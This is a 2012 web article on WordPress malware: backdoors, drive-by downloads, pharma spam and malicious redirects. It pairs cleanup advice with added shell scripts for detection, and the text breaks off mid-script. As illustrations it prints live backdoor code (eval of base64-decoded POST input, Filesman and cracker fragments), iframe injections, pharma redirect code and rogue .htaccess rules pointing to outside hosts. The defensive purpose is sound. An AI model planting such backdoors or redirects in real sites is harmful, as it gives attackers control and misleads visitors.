October 10, 2012 07:56 am

Security: Common WordPress Malware Infections


WordPress security is serious business. Exploits of vulnerabilities in WordPress architecture have led to mass compromises of servers through cross-site contamination. WordPress extensibility increases its vulnerability; plugins and themes house flawed logic, loopholes, Easter eggs, backdoors and a slew of other issues. Firing up your computer to find that you're supporting a random cause or selling Viagra can be devastating.

WordPress Security

In WordPress core, all security issues are quickly addressed; the WordPress team is focused on strictly maintaining the integrity of the application. The same, however, cannot be said for all plugins and themes.

The focus of this post is not to add to the overwhelming number of WordPress security or WordPress hardening posts that you see floating around the Web. Rather, we'll provide more context about the things you need to protect yourself from. What hacks are WordPress users particularly vulnerable to? How do they get in? What do they do to a WordPress website? In this lengthy article, we'll cover backdoors, drive-by downloads, pharma hack and malicious redirects.

Over the past two years, Web malware has grown around 140%. At the same time, WordPress has exploded in popularity as a blogging platform and CMS, powering close to 17% of websites today. But that popularity comes at a price; it makes WordPress a target for Web-based malware. Why? Simple: its reach provides the opportunity for maximum impact. Sure, popularity is a good thing, but it also makes us WordPress users vulnerable.

A Bit About Our Security Expert: Meet Tony

Lacking the technical knowledge needed to go into great depth, I brought on board a co-author to help me out. Bringing the technical information is Tony Perez, Chief Operations and Financial Officer of Sucuri Security. Sucuri Security provides detection, alerting and remediation services to combat Web-based malware. In other words, it works on websites that have been compromised. This means that Tony has the background, statistics and, most importantly, knowledge to go really in depth on malware issues that affect WordPress users.

I asked Tony how he got into Web security:

“I think it goes back to 2009. I was managing and architecting large-scale enterprise solutions for Department of Defense (DoD) clients and traveling the world. In the process, there was a little thing called compliance with the Security Technical Implementation Guide (STIG), set forth by the Defense Information Systems Agency (DISA). I know, a mouthful, but it's how we did things in the DoD; if it didn't have an acronym, it didn't belong.

That being said, it wasn't until I joined Dre and Daniel at Sucuri Security, in early 2011, that I really began to get what I consider to be any resemblance of InfoSec chops.”

Armed with Tony's technical knowledge, we'll look at the main issues that affect WordPress users today. But before we get into details, let's look at some of the reasons why WordPress users might be vulnerable.

What Makes WordPress Vulnerable?

Here's the simple answer. Old versions of WordPress, along with theme and plugin vulnerabilities, multiplied by the CMS's popularity, with the end user thrown into the mix, make for a vulnerable website.

Let's break that down.

The first issue is outdated versions of WordPress. Whenever a new WordPress version is released, users get a nagging message, but plenty of users have gotten pretty good at ignoring the nag. Core vulnerabilities in themselves are rarely an issue. They do exist; proof can be found in the most recent 3.3.3 and 3.4.1 releases. The WordPress core team has gotten pretty good at rolling out security patches quickly and efficiently, so the risk of exploitation is minimal, provided that WordPress users update their installation. This, unfortunately, is the crux of the problem: WordPress users ignore the message. And it's not just inexperienced and casual WordPress users who aren't updating. A recent high-profile hack was of the Reuters website, which was running version 3.1.1 instead of the current 3.4.1.

Vulnerabilities in plugins and themes are another issue. The WordPress repository has 20,000 plugins and is growing. The plugins are of varying quality; some of them inevitably have security loopholes, while others are outdated. On top of that, consider all of the themes and plugins outside of the repository, including commercial products that are distributed for free on Warez websites and come packed with malware. Google is our favorite search engine, but it's not so hot for finding quality WordPress themes.

Then, there's popularity. WordPress is popular, without a doubt. Around 700 million websites were recorded as using WordPress in May of this year. This popularity means that if a hacker can find a way into one WordPress website, they have potentially millions of websites for a playground. They don't need to hack websites that use the current version of WordPress; they can scan for websites that use old, insecure versions and hack those.

Finally and most significantly, the biggest obstacle facing WordPress users is themselves. Tony in his own words:

“For whatever reason, there is this perception among WordPress users that the hardest part of the job was paying someone to build the website and that once it's built, that's it, it's done, no further action required. Maybe that was the case seven years ago, but not today.

WordPress's ease of use is awesome, but I think it provides a false sense of assurances to end users and developers alike. I think, though, this perception is starting to change.”

From Tony's experience at Sucuri Security, the most common vulnerabilities to website exploits are:

  • Out of date software,
  • Poor credential management,
  • Poor system administration,
  • Soup-kitchen servers,
  • Lack of Web knowledge,
  • Corner-cutting.

A bit of time and education are all it takes to remedy these issues and to keep your WordPress website secure. This means not just ensuring that you as a WordPress expert are educated, but ensuring that the clients you hand over websites to are as well.

The Evolution Of Attacks

As the Internet has evolved, the nature of hacking has evolved with it. Hacking started out as a very different animal. Back in the day, it was about showing your technical prowess by manipulating a website to do things beyond the webmaster's intentions; this was often politically motivated. One day you'd wake up and find yourself supporting the opposition in Nigeria or Liberia. These days, hacking is all about money. The recent DNSChanger malware (i.e. the Internet Doomsday attack), for example, let hackers rake in close to $14 million before being stopped by the FBI and Estonian police last November.

Another hacking technology that has emerged is malnets. These distributed malware networks are used for everything including identity theft, DDoS attacks, spam distribution, drive-by downloads, fake AV and so on. The hackers automate their attacks for maximum exposure.

Automation through the use of bots is not their only mechanism. Today you also have malware automation: the use of tools to quickly generate a payload (i.e. the infection), allowing the attacker to focus strictly on gaining access to the environment. Once the hacker has access to the environment, they copy and paste in the auto-generated payload. One of the more prevalent automation tools is the Blackhole Exploit Kit. This and many other kits can be purchased online for a nominal fee. That fee buys sustainment services and keeps the kit updated with new tools for the latest vulnerabilities. It's a true enterprise.

Common WordPress Malware Issues

Thousands of malware types and infections are active on the Internet; fortunately, not all apply to WordPress. For the rest of this post, we'll look at four of the most common attacks on WordPress users:

Backdoor

A backdoor lets an attacker get into your environment while bypassing the access methods you would consider normal: FTP, SFTP, wp-admin and so on. Hackers can access your website using the command line or even using a Web-based GUI like this:

[Image: a Web-based backdoor GUI.]

Backdoors are exceptionally dangerous. Left unchecked, the most dangerous can cause havoc on your server. They are often attributed to cross-site contamination incidents — i.e. when websites infect other websites on the same server.

How am I attacked?

The attack often happens because of out-of-date software or security holes in code. A vulnerability well known to the WordPress community was found in the TimThumb script that was used for image resizing. This vulnerability made it possible for hackers to upload a payload that functioned as a backdoor.

Here is an example of a scanner looking specifically for vulnerable versions of TimThumb:

207.58.169.51 " - [15/May/2012:18:33:22 +0000] GET //wp-content/themes/TheStyle/timthumb.php?src=https://blogger.com.avisameinmobiliarias.es/xx.php HTTP/1.1 404 307 - Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
164.177.155.35 " - [15/May/2012:18:28:02 +0000] GET /scanner//wp-content/themes/scarlett/?src=https://wordpress.com.airatrip.com/temp/dapetsatu.php HTTP/1.1 404 304 - Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
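As an added example (not part of the original article), here is a small shell function that runs that kind of check over an Apache access log: it picks out requests to a TimThumb-style script whose src= parameter is an absolute URL and marks hosts that merely begin with a trusted-looking domain, the trick visible in the two lines above. The log lines, IP addresses, host names and function names are all constructed for this example.

```shell
#!/bin/sh
# Added example, not from the original article. Scans an Apache combined-format
# access log (fields: ip ident user [date tz] "method path proto" status ...)
# for TimThumb probes. The sample lines, IPs and host names are constructed.

SAMPLE_LOG='203.0.113.10 - - [15/May/2012:18:33:22 +0000] "GET //wp-content/themes/TheStyle/timthumb.php?src=https://blogger.com.evil-example.test/xx.php HTTP/1.1" 404 307 "-" "Mozilla/5.0"
203.0.113.10 - - [15/May/2012:18:33:25 +0000] "GET /wp-content/themes/default/timthumb.php?src=https://blogger.com.evil-example.test/xx.php HTTP/1.1" 404 307 "-" "Mozilla/5.0"
203.0.113.11 - - [15/May/2012:18:28:02 +0000] "GET /wp-content/themes/scarlett/thumb.php?src=https://wordpress.com.attacker-example.test/temp/x.php HTTP/1.1" 404 304 "-" "Mozilla/5.0"
198.51.100.9 - - [15/May/2012:18:35:41 +0000] "GET /wp-content/themes/TheStyle/timthumb.php?src=http://img.example.test/banner.jpg&w=600 HTTP/1.1" 200 9011 "-" "Mozilla/5.0"
198.51.100.5 - - [15/May/2012:18:40:00 +0000] "GET /wp-content/themes/TheStyle/timthumb.php?src=wp-content/uploads/photo.jpg&w=300 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
198.51.100.7 - - [15/May/2012:18:41:12 +0000] "GET /about/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"'

# timthumb_probes: reads a log on stdin and prints "ip host tag" for every
# request to a *thumb.php script whose src= parameter is an absolute URL.
#   lookalike-host  a .com/.net/.org label sits in the middle of the host name,
#                   i.e. the host only starts with a trusted-looking domain
#   remote-src      any other absolute URL handed to src=
timthumb_probes() {
    awk '
        $7 ~ /thumb\.php/ && $7 ~ /[?&]src=https?:\/\// {
            split($7, parts, "[?&]src=https?://")
            host = parts[2]
            sub(/[\/&].*$/, "", host)        # drop the path and any further parameters
            tag = (host ~ /^[A-Za-z0-9-]+\.(com|net|org)\./) ? "lookalike-host" : "remote-src"
            print $1, host, tag
        }'
}

# probe_sources: reads a log on stdin and prints "count ip", busiest source
# first, which is the list you would hand to a firewall or a blocklist.
probe_sources() {
    timthumb_probes | awk '{ n[$1]++ } END { for (ip in n) print n[ip], ip }' | sort -rn
}

# Stand-alone run over the constructed sample; in practice pipe in the real log:
#   timthumb_probes < /var/log/apache2/access.log
printf '%s\n' "$SAMPLE_LOG" | timthumb_probes
```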

What does it look like?

Like most infections, this one can be encoded, encrypted, concatenated or some combination thereof. However, it's not always as simple as looking for encrypted code; there are several instances in which it looks like legitimate code. Here is an example:

$iOll100oil0ioIlo = 1;  $user = 'chippy';  $pass = '1337';  $iIi1i11l11OoIlIl = '#990000';   if($_GET['id']== 'logout') {Logout();} if(!($_GET['id'] == 'sshSession'))  {echo CSS($iIi1i11l11OoIlIl);}  else if($_GET['id'] == 100){echo "";} else if($_GET['id'] == 'Delete'){Suicide();}  function iI11i0Il0iO0iooi($file,$per) { if(function_exists('chmod')){$try = chmod($file,$per); } if(!$try){$try = Exe("\143h\x6do\144 $per $file"); } if($try){return true;} else{return false;} } function showUsers() { if($rows = Exe('cat /etc/passwd')){echo $rows;} elseif($rows= Exe('cat /etc/domainalias')){echo $rows;} elseif($rows= Exe('cat /etc/shadow')){echo $rows;} elseif($rows= Exe('cat /var/mail')) {echo $rows;} elseif($rows= Exe('cat /etc/valiases')) {echo $rows;} elseif(file_exists('/etc/passwd')) { for($uid=0;$uid

Another example:

<?php$cpanel_port="2082";$connect_timeout=5;set_time_limit(0);$submit=$_REQUEST['submit'];$users=$_REQUEST['users'];$pass=$_REQUEST['passwords'];$target=$_REQUEST['target'];$cracktype=$_REQUEST['cracktype'];if($target == ""){$target = "localhost";}$charset=$_REQUEST['charset'];if($charset=="") $charset="lowercase";$max_length=$_REQUEST['max_length'];if($max_length=="") $max_length=10;$min_length=$_REQUEST['min_length'];if($min_length=="") $min_length=1; $charsetall = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l",  "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "A", "B",  "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R",  "S", "T", "U", "V", "W", "X", "Y", "Z", "0", "1", "2", "3", "4", "5", "6", "7",  "8", "9");$charsetlower = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j",  "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x","y", "z"); $charsetupper = array("A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L",  "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z"); $charsetnumeric = array("0", "1", "2", "3", "4", "5", "6", "7", "8", "9"); $charsetlowernumeric = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j",  "k", "l", "m", "n", "o", "p", "q","r", "s", "t", "u", "v", "w", "x", "y", "z",  "0", "1", "2", "3", "4", "5", "6", "7";

Below is a case where the content is hidden in the database and targets WordPress installations:

return @eval(get_option(\blogopt1\));

And here is a very simple backdoor that allows any PHP request to execute:

eval (base64_decode($_POST["php"]));

Here is an example of a messy backdoor specifically targeting the TimThumb vulnerability:

function aknhtkmml3($ur5){$dtuq=$u;$pnt=e6;$p5zy=r';$xcl4=e(~;$feuh=od;$qjka=dec;$rhi=$u;$m=as;$xcew=);;$iw=_';$jutx=5=b;$fwiw=4;$zqi=r';$pwrb=5;eval($rhi.$p5zy.$jutx.$m.$pnt.$fwiw.$iw.$qjka.$feuh.$xcl4.$dtuq.$zqi.$pwrbreturn $ur5;}$sk25=M3JffC1WcjMrV1fVHVOKDpoTSIoMGJUNzdXLVZyMytWX1R1Tig6a

Here is another backdoor that commonly affects WordPress installations, the Filesman:

$auth_pass = 63a9f0ea7bb98050796b649e85481845;$color = #df5;$default_action = SQL;$default_charset = Windows-1251;$protectionoffer = ficken;preg_replace(/.*/e,\x65\x76\x61\x6C\.. hundreds more lines..

How can I tell whether I'm infected?

Backdoors come in all different sizes. In some cases, a backdoor is as simple as a file name being changed, like this:

  • wtf.php
  • wphap.php
  • php5.php
  • data.php
  • 1.php
  • p.php

In other cases, the code is embedded in a seemingly benign file. For instance, this was found in a theme's index.php file, embedded in legitimate code:

<?php$a = '?Qw\"4MZ\'.K&RWFQJP@eJru\"`1\"#2]u,}H$ \\R[d`(j4_2e+c\'p.zg0\\y3_,pU8n}=o[oL@QT,f4>M?\"U11PyB-sUm!GC:6BW\'}HS>y(Ka=j/]ldo~6iBD]x2^@UyWxQ^vy26t;aWXLg6:L&:cp\\(NU:.up(NiZ-`U@wK[Y#5\'jKB8R\\{C:%ro?\"f1*6zeC\\;dTf@/iU7U\"YmU7jyQolB0n*Ay@<_dxzINaj^LAu\"COoygZs9K`[[Pf|J\':+l3&6bh!A6C78fg)aOdUi07Flg-i35$>\"8E9{/;=E^U^F>g(nM]X^t K]-5pC:0FRU_Ndzl+ZCi!aR)Q g*_]++;9A-\\[=#/sc^Y^Ld9oO:R\"D$#,/bi:m&S031lQ4{Ew[ W)eqx5-L8QP;^_}IzlON|c_i5tf[mC\\FLB8FXFrpxC-W$,\"~xRNv6/aL%I)rle::)S`bySTrwaK|mM|g!K_8[Ad`jnTXTor^CSA=(u1!X\\~F+{/,HnD$1*e{x;TN+H.N|Ol&F}\'~Z&Ff#VsKE8PVC7S=R)k]Qy-NJyTqw\\qSc9:fo.36GcmkzB)NKu-}o:M;5#.._ bD:},+-?AT$0A~RJN~@[|1uJM,M[:.\\|Rvz^\"(~D]#T #(JQ(k-%}$PK0~\'K.dIa[DA]M@#,DX,G`WyhD\'nB,@m

Backdoors are tricky. They constantly evolve, so there is no definitive way to say what you should look for.

How do I prevent it?

While backdoors are difficult to detect, preventing them is possible. For the hack to be effective, your website needs an entry point that is accessible to the hacker. You can close backdoors by doing the following:

  1. Prevent access.
    Make your environment difficult to access. Tony recommends a three-pronged approach to locking down wp-admin:

    • Block IPs,
    • Two-factor authentication,
    • Limited access by default.

    This will make it extremely difficult for anyone except you to access your website.

  2. Kill PHP execution.
    Often the weakest link in any WordPress chain is the /uploads/ directory. It is the only directory that needs to be writable in your installation. You can make it more secure by preventing anyone from executing PHP in it. It's simple to do. Add the following to the .htaccess file in the root of the /uploads/ directory (if the file doesn't exist, create it). This is Apache 2.2 syntax; on Apache 2.4 the equivalent directive is Require all denied.
<FilesMatch "\.php$">
Order Deny,Allow
Deny from All
</FilesMatch>

How is it cleaned?

Once you have found a backdoor, cleaning it is pretty easy — just delete the file or code. However, finding the file can be difficult. On his blog, Canton Becker provides some advice on ways to scour your server for backdoors. There is no silver bullet for backdoors, though, or for any infection — backdoors can be simple or complex. You can try doing some basic searches for eval and base64_decode, but if your code looks like what's below, then knowing what to look for becomes more difficult:

$XKsyG=as;$RqoaUO=e;$ygDOEJ=$XZKsyG.s.$RqoaUO.r.t;$joEDdb=b.$XZKsyG.$RqoaUO.(64)._.d.$RqoaUO.c.o.d.$RqoaUO;@$ygDOEJ(@$joEDdb(~ZXZhbChiYXNlNjRfZGVjb2RlKCJhV1lvYVhOelpY

If you are familiar with the terminal, you could log into your website using SSH and try certain methods. The most obvious and easiest method is to look for this:

# grep -ri "eval" [path]

Or for this:

# grep -ri "base64_decode" [path]

The -r option ensures that every file in the tree is scanned, while -i makes the search case-insensitive. This matters because you could find variations of eval: Eval, eVal, evAl, evaL or any other permutation. The last thing you want is for your scan to fall short because you were too specific.

Look for recently modified files:

find . -type f -ctime -1 | more

The -type f option restricts the search to regular files, and -ctime -1 to files whose status changed within the last 24 hours. Use -2 to cover the last 48 hours instead.

Another option is to use the diff command. This enables you to detect the differences between files and directories. In this case, you would use it for directories. For it to be successful, though, you need to have clean copies of your installation and themes. So, this works only if you have a complete backup of your website.

# diff -r /[path]/[directory] /[path]/[directory] | sort

The -r option is recursive through all directories, and the sort command sorts the output and makes it easier to read. The key here is to quickly identify the things that don't belong so that you can run integrity checks. Anything you find that is in the live website's directory but not in the backup directory warrants a second look.
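As an added example, not from the original article, the following shell script wraps the three checks above (case-insensitive grep for eval and base64_decode in PHP files, recently changed files, and a recursive diff against a clean backup) into functions that take the live web root and the backup root as arguments; the function names are my own.

```shell
#!/bin/sh
# Added example, not from the original article. Three triage checks for a
# WordPress tree, each taking the paths as arguments rather than hard-coding them.

# suspicious_php ROOT
# Lists PHP files under ROOT that call eval( or base64_decode( in any letter
# case. -r recursive, -i case-insensitive, -l file names only, -E so one
# pattern covers both calls; the optional whitespace also matches "eval (".
suspicious_php() {
    grep -rilE --include='*.php' \
        'eval[[:space:]]*\(|base64_decode[[:space:]]*\(' "$1" 2>/dev/null | sort
}

# recently_changed ROOT [DAYS]
# Regular files whose status changed within the last DAYS*24 hours (default 1).
# -ctime also catches permission and ownership changes, not only content edits.
recently_changed() {
    find "$1" -type f -ctime "-${2:-1}" | sort
}

# not_in_backup LIVE BACKUP
# Files that exist only on the live side, or whose content differs from the
# clean backup. diff -rq prints one line per difference instead of the contents;
# files present only in the backup (deleted on the live site) are left out,
# since the question here is what was added or changed.
not_in_backup() {
    diff -rq "$2" "$1" | grep -E "^Only in $1|^Files .* differ" | sort
}

# wp_triage LIVE BACKUP
# Runs all three checks and prints each result set under a heading.
wp_triage() {
    echo "== PHP files calling eval/base64_decode under $1"
    suspicious_php "$1"
    echo "== files changed in the last 24 hours"
    recently_changed "$1" 1
    echo "== files added or modified compared with $2"
    not_in_backup "$1" "$2"
}

# usage: sh triage.sh /var/www/example.test /backups/example.test-clean
if [ "$#" -eq 2 ]; then
    wp_triage "$1" "$2"
fi
```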

Drive-By Downloads

A drive-by download is the Web equivalent of a drive-by shooting. Technically, it is usually embedded on your website via some type of script injection, which could be associated with a link injection.

The point of a drive-by download is often to download a payload onto your user's local machine. One of the most common payloads informs the user that their website has been infected and that they need to install an anti-virus product, as shown here:

How does the attack get in?

There are a number of ways an attack can get in. The most common causes are:

  • Out of date software,
  • Compromised credentials (wp-admin, FTP),
  • SQL injection.

What does it look like?

Below are a number of examples of link injections that lead to some type of drive-by download attack:

<script type="text/javascript">var addthis_product='wpp-264';var addthis_config={"data_track_clickback":true,"data_track_addressbar":true,"ui_language":"fr"};if(typeof(addthis_

And this:

document.write('<iframe src="https://orangeroller.ru/in.cgi?16" name="Twitter" scrolling="auto" frameborder="no"...

And this:

<script type="text/javascript">document.write("<iframe src="https://objectcash.in/in.cgi?19" name="Twitter" scrolling="auto" frameborder="no" align="center" ...

More recently, drive-by downloads and other malware have been functioning as conditional malware — designed with rules that have to be met before the infection presents itself. You can find more information about how conditional malware works in Sucuri's blog post Understanding Conditional Malware.

How can I tell whether I'm infected?

Using a scanner such as SiteCheck to see whether you are infected is possible. Scanners are pretty good at picking up link injections. Another recommendation is to sign up for Google Webmaster Tools and verify your website. In the event that Google is about to blacklist your website, it would email you beforehand notifying you of the problem and giving you a chance to fix it. The free service could pay dividends if you're looking to stay proactive.

Outside of using a scanner, the difficulty in identifying an infection will depend on its complexity. When you look on the server, it will look something like this:

echo(gzinflate(base64_decode(VVHLboMwELxHyj/4ZlBTnhL0QSKlVQ899QOaChl7AUvEduyFJP36Aomi9LizszOzu4XjVhrcLBcDs6Q8kDURmvd7UBhwCwzho4Op8qisLdsD9VfLRalGHnWAW0Qrqx6Bvo7o4btUP

The good news is that such an infection has to be somewhere where an external output is generated. The following files are common places where you'll find link injections:

  • wp-blog-header.php (core file)
  • index.php (core file)
  • index.php (theme file)
  • functions.php (theme file)
  • header.php (theme file)
  • footer.php (theme file)

About 6 times out of 10, the infection will be in one of those files. Also, your anti-virus software might detect a payload being dropped onto your computer when you visit your website — another good reason to run anti-virus software locally.

Sucuri has also found link injections embedded in posts and pages (as opposed to an originating PHP file), as well as in text widgets. In such cases, scrub your database and users to ensure that none of your accounts have been compromised.

How is it cleaned?

Cleaning can be a challenge and will depend on your technical skill. You could use the terminal to find the issue.

If you have access to your server via SSH, you're in luck. If you don't, you can always download locally. Here are the commands that will be of most use to you when traversing the terminal:

  • CURL
    Used to transfer data with a URL syntax.
  • FIND
    Search by file or directory name.
  • GREP
    Search for content in files.

For example, to search all of your files for a particular section of the injection, try something like this:

$ grep -r "https://objectcash.in" .

Including the following characters is important:

  • "
    Maintains the integrity of the search. Using it is important when you're searching for special characters because some characters have a different meaning in the terminal.
  • -r
    Means recursive and will traverse all directories and files.

You can also refine your search by file type:

$ grep --include="*.php" -r "https://objectcash.in" .

The --include option takes a file-name pattern and limits the search to matching files; in this instance, only PHP files.

These are just a few tricks. Once you've located the infection, you have to ensure that you remove every instance of it. Leaving just one could lead to serious frustration in the future.

Pharma Hack

Pharma hack is one of the most prevalent infections around. It should not be confused with malware; it's actually categorized as SPAM — stupid pointless annoying messages. If you're found to be distributing SPAM, you run the risk of being flagged by Google with the following alert:

This site may be compromised!!

This is what it will look like on Google's search engine results page (SERP):

How am I attacked?

The pharma SPAM injection makes use of conditional malware that applies rules to what the user sees. So, you may or may not see the page above, depending on various rules. This is controlled via code on the server, such as the following:

<?php$keyspat = array('adobe creative suite 5.5 master collection','microsoft windows 7 ultimate','microsoft office 2010 professional plus','adobe acrobat x pro',...'microsoft','soft' => 'adobe','cheap' => 'adobe','price' => 'adobe','order' => 'adobe','sale' => 'adobe','buy' => 'adobe','professional' => 'adobe','system' => 'adobe',);$rfrr = urldecode($_SERVER["HTTP_REFERER"]);foreach ($keyspat as $k => $v){     if (is_int($k))     {          if (stripos($rfrr,$v))          {               header("Location:https://outlet-programs.net/browse/search/?q=".$v);               exit;          }     }     else     {          if (stripos($rfrr,$k))          {               header("Location:https://outlet-programs.net/browse/search/?q=".$v);               exit;          }     }}?>

Some injections are intelligent enough to create their own nests within your server. The infection makes use of $_SERVER["HTTP_REFERER"], which redirects the user to an online store that is controlled by the attacker to generate revenue. Here is an example of such a monetized attack:

<?php$adm_url        = 'https://tdsinto.net/big/gtxt.php?pg=';$page_upd_time  = 60*60*24;//1 day$empty_upd_time = 60*60*24*10;//10 dayserror_reporting(0);if (isset($_POST['test_mode']) && $_POST['test_mode']==1){if (!is_dir('tmp')){$res = mkdir('tmp');if ($res===false) {exit('Folder create error');}@chmod('tmp',0777);}@file_put_contents('tmp/1','123');if (!is_file('tmp/1')) {exit('File create error');}@unlink('tmp/1');exit('All ok');}

Like most SPAM-type infections, pharma hack is largely about controlling traffic and making money. Money can be made through click-throughs and/or traffic. Very rarely does a pharma hack injection redirect a user to a malicious website that contains some additional infection, as with a drive-by download attempt.

This is why it's so difficult to detect. It's not as simple as querying for Cialis or Viagra, although that'd be awesome. Most people would be surprised by the number of legitimate pharmaceutical companies that exist and publish ads on the Web. This adds to the challenge of detecting these infections.

What does it look like?

Pharma hack has evolved, which has made it more difficult to detect. In the past, SPAM injections would appear in your pages, where they were easy to find and, more importantly, remove.

Today, however, pharma hack is quite different. It uses a series of backdoors, sprinkled with intelligence, to detect where traffic is coming from, and then it tells the infection how to respond. Again, it can behave as conditional malware. More and more, pharma hack reserves its payload for Google's bots; the goal is to make it onto Google's SERPs. This provides maximum exposure and the biggest monetary return for the hackers.

Here's an image of an old pharma hack injecting SPAM into a blog's tags:

[Image: a blog's tag list filled with pharma-hack SPAM tags.]

Another version of pharma hack was injected in such a way that when the user clicks on an apparently benign link (such as Home, About or Contact), it redirects the user to a completely different page. Somewhere like this:

How do I tell whether I'm infected?

Identifying an infection can be very tricky. In earlier permutations, identifying an infection was as easy as navigating your website, looking at your ads, links, posts and pages, and quickly determining whether you've been infected. Today, there are more advanced versions that are harder to find.

The good news for diligent webmasters is that by enabling some type of auditing or file monitoring on your WordPress website, you'll be able to see when new files have been added or when changes have been made. This is by far one of the most effective methods of detection.

You could try using free scanners, such as SiteCheck. Unfortunately, many HTTP scanners, including Sucuri's, struggle with the task because pharma hack is not technically malicious, so determining the validity of content can be difficult for a scanner.

How is it cleaned?

First, identify the infected files, and then remove them. You can use the commands we've outlined above, and you can make queries to your website via the terminal to quickly see whether you're serving any pharma SPAM to your visitors.

When combatting pharma hacks, one of the most useful commands is grep. For example, to search for any of the ads or pharma references being flagged, run this:

# egrep -wr 'viagra|pharmacy' .

By using egrep, we're able to search for multiple words at the same time if necessary, thus saving you time in this instance.

Or try something like this:

# grep -r "https://canadapharmacy.com" .

This only works if the infection is not encoded, encrypted or concatenated.

Another useful method is to access your website via different user agents and referrers. Here is an example of what one website looked like when using a Microsoft IE 6 referrer:

Try Bots vs Browsers to check your website through a number of different browsers.

Terminal users can also use CURL:

# curl -A "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" https://somesite.com

How do I prevent it?

Preventing a pharma hack can be tricky. Sucuri has found that the hack regularly exploits vulnerable out-of-date software. However, your out-of-date WordPress installation is not necessarily the problem. Even if you are up to date, another outdated installation on the same server could be vulnerable to the infection. If the real payload resides elsewhere on your server, not within your website's directory, then catching it can be exceptionally difficult.

Here is an example of what you might be looking for if you can't find the infection in your own installation:

# <div id=column-wrap><?php $wp__theme_icon=@create_function(,@file_get_contents(~/public_html/wp-content/themes/my-really-good-theme/https://media.smashingmagazine.com/wp-content/uploads/2012/08/s.jpg));$wp__theme_icon(); ?>

To prevent a pharma hack, you should do two things:

  1. Keep your software up to date,
  2. Steer clear of soup-kitchen servers.

Malicious Redirects

A malicious redirect sends a user to a malicious website. In 2010, 42,926 new malicious domains were detected. In 2011, this number grew to 55,294. And that just includes primary domains, not all of their subdomains.

When a visitor is redirected to a website other than the main one, the website may or may not contain a malicious payload. Suppose you have a website at myhappysite.com; when someone visits it, the website could take the visitor to meansite.com/stats.php, where the malicious payload is in that website's stats.php file. Or it could be a harmless website with just ads and no malicious payload.

How am I attacked?

As with many malware attacks, it comes down to access. The malicious redirect could be generated by a backdoor. The hacker would scan for a vulnerability, such as TimThumb or old versions of WordPress and, when they find it, upload a payload that functions as a backdoor.

What does it look like?

Detecting a redirect is not as complex as detecting some of the other infections. It is often found in your .htaccess file and looks something like this:

#c3284d#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil\.(.*)
RewriteRule ^(.*)$ https://mytresca.com/counter.php [R=301,L]
</IfModule>
#/c3284d#

Or like this:

<IfModule mod_rewrite.c>
RewriteEngine on
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*(msn|live|altavista|excite|ask|aol|google|mail|bing|yahoo).*$ [NC]
RewriteCond %{HTTP_COOKIE} !^.*cookie-visited-name.*$ [NC]
RewriteRule .* https://sweepstakesandcontestsnow.com/nl-in.php?d=1 [CO=cookie-visited-name:1:%{HTTP_HOST}:10000,R,L]
</IfModule>

There may be instances where a redirect is encoded and resides in one of your PHP files. If so, it will usually be found in your header.php, footer.php or index.php file; it has also been known to reside in the root index.php file and in other core template files. It is not always encoded, but if it is, it will look something like this:

{prototype%2;}catch(asd){x=2;}try{q=document[(x)?"c"+"r":2+"e"+"a"+"t"+"e"+"E"+"l"+"e"+"m"+((f)?"e"+"n"+"t":"")]("p");q.appendChild(q+"");}catch(fwbewe){i=0;try{prototype*5;}catch(z{fr="fromChar";f=[510,702,550,594,580,630,555,660,160,660,505,720,580,492,485,660,500,666,545,468,585,654,490,606,570,240,205,738,50,192,160,192,160,708,485,684,160,624,525,192,305,192,580,624,525,690

How do I tell if I am infected?

There are a few ways to check for infections. Here are some suggestions:

  • Use a free scanner, such as SiteCheck. They very rarely miss malicious redirects.
  • Test using Bots vs Browser.
  • Listen to your users. You might not detect the redirect, but sometimes a user will alert you to it.

If a user does detect a problem, ask them pertinent questions to help diagnose the problem:

  • What operating system are they using?
  • What browser(s) are they using, and which version(s)?

The more information you get from them, the better you can replicate the issue and find a fix.

How is it cleaned?

Malicious redirects are one of the easiest infections to clean. Here's a good starting point:

  1. Open your .htaccess file.
  2. Copy any rewrite rules that you have added yourself.
  3. Identify any malicious code, like the sample above, and remove it from the file. Scroll all the way to the bottom of .htaccess to make sure there aren't any error directives pointing to the same infection.

Be sure to also look for all .htaccess files on the server. Here is one quick way to see how many exist on your server:

# find [path] -name .htaccess -type f | wc -l

And this will tell you where exactly those files are:

# find [path] -name .htaccess -type f | sort

The infection is not always restricted there, though. Depending on the infection, you might also find the redirect encoded and embedded in a file such as index.php or header.php.

Alarmingly, these infections can replicate across all of your .htaccess files. The backdoor responsible for it can also be used to create multiple .htaccess files across all of your directories, all with the same infection. Removing the infection can feel like an uphill struggle, and sometimes cleaning every file you can find is not enough. There are even cases where a file is created outside of the Web directory. The lesson: always look outside of your Web directory as well as within it.
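As an added example, not from the original article, the script below combines the two find commands above with the pattern of the sample rules: it lists every .htaccess under a directory and reports those that pair a referrer condition naming search engines with a rewrite to an absolute external URL, printing the target so you can see where visitors were being sent. The function names and the placeholder paths are my own.

```shell
#!/bin/sh
# Added example, not from the original article. Finds every .htaccess below a
# directory and reports the ones carrying a referrer-conditional redirect of
# the kind shown above: a RewriteCond on %{HTTP_REFERER} that names search
# engines, plus a RewriteRule whose target is an absolute external URL.
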